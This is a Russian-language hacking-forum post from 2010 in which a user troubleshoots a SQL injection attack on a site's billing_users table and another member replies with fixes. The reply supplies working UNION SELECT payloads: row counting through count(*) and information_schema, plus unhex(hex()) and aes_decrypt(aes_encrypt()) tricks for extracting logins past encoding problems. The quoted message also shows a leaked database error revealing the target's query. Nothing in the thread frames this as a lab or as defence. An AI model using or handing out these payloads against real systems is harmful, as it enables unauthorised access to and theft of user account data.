Показать сообщение отдельно

  #10  
Старый 05.05.2010, 23:14
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами: 8638130

Репутация: 54
По умолчанию

Цитата:
подскажите плиз по скуле. в общем подобрал все нужное и колво столбцов и имя таблицы. делаю запрос на несуществующее поле - вылетает ошибка (как положено) Ввожу запрос правильный (через скулю) он не выводит информацию из БД а тупо отображает то что было если бы я не вставлял скулю. ' UNION SELECT 1, login FROM billing_users LIMIT 0,1 -- выдает страницу без изменений ' UNION SELECT 1, login1 FROM billing_users LIMIT 0,1 -- A Database Error Occurred Error Number: 1054 Unknown column 'login1' in 'field list' SELECT login, email FROM billing_users WHERE login = '' UNION SELECT 1, login1 FROM billing_users LIMIT 0,1 -- ' OR email = '' То есть запрос вроде верный в 1ом случае а он ничего не выводит, ни на страницу, не в исходнике =( Это я так понимаю Blind SQL Injection и тут методом перебора только ? или как?
нет не блинд....
причины:
1)таблица находится в другой базе
2)таблица пустая
3)проблемы с кодировками

решение:
1)придется смириться
2)для mysql4
' UNION SELECT 1, count(*) FROM billing_users--
для mysql5
' UNION SELECT 1, table_rows FROM information_schema.tables where table_name= 'billing_users'--
если вывело 0 значит таблица пустая
3)' UNION SELECT 1, unhex(hex(login)) FROM billing_users LIMIT 0,1 --
' UNION SELECT 1, aes_decrypt(aes_encrypt(login,12),12) FROM billing_users LIMIT 0,1 --
 
Ответить с цитированием